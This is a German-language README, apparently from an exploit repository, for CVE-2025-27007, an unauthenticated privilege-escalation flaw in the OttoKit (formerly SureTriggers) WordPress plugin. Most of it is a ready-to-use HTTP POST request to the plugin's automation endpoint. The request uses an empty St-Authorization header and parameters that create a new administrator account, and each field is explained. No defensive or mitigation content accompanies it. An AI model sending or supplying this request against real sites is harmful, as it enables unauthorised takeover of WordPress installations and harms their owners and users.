
Ausnutzung von CVE-2025-27007, einer kritischen Schwachstelle zur Rechteausweitung ohne Authentifizierung im WordPress-Plugin OttoKit (ehemals SureTriggers).
Ausnutzung von CVE-2025-27007, einer kritischen Schwachstelle bei der unbefugten Privilegienerweiterung im OttoKit-Plugin (ehemals SureTriggers) für WordPress. Dieses Repository beschreibt, wie ein Angreifer auf einer verwundbaren WordPress-Seite ein Administratorkonto erstellen kann.
Die Schwachstelle kann unter den folgenden Umständen ausgenutzt werden:
Die folgende Anfrage zielt auf den Endpunkt /wp-json/sure-triggers/v1/automation/action, um ein Administratorkonto zu erstellen:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
Endpoint: POST /wp-json/sure-triggers/v1/automation/action
St-Authorization: (leer): Umgeht die Authentifizierung, wenn das Plugin nicht konfiguriert ist.
selected_options[user_name]: Benutzername für das neue Konto (z. B. new_admin).
selected_options[user_email]: E-Mail-Adresse für das neue Konto (z. B. [email protected]).
selected_options[password]: Passwort für das neue Konto (z. B. StrongP@ssw0rd123).
selected_options[role]: Auf administrator gesetzt, um volle Rechte zu gewähren.
type_event: Auf create_user_if_not_exists gesetzt, um die Benutzererstellung auszulösen.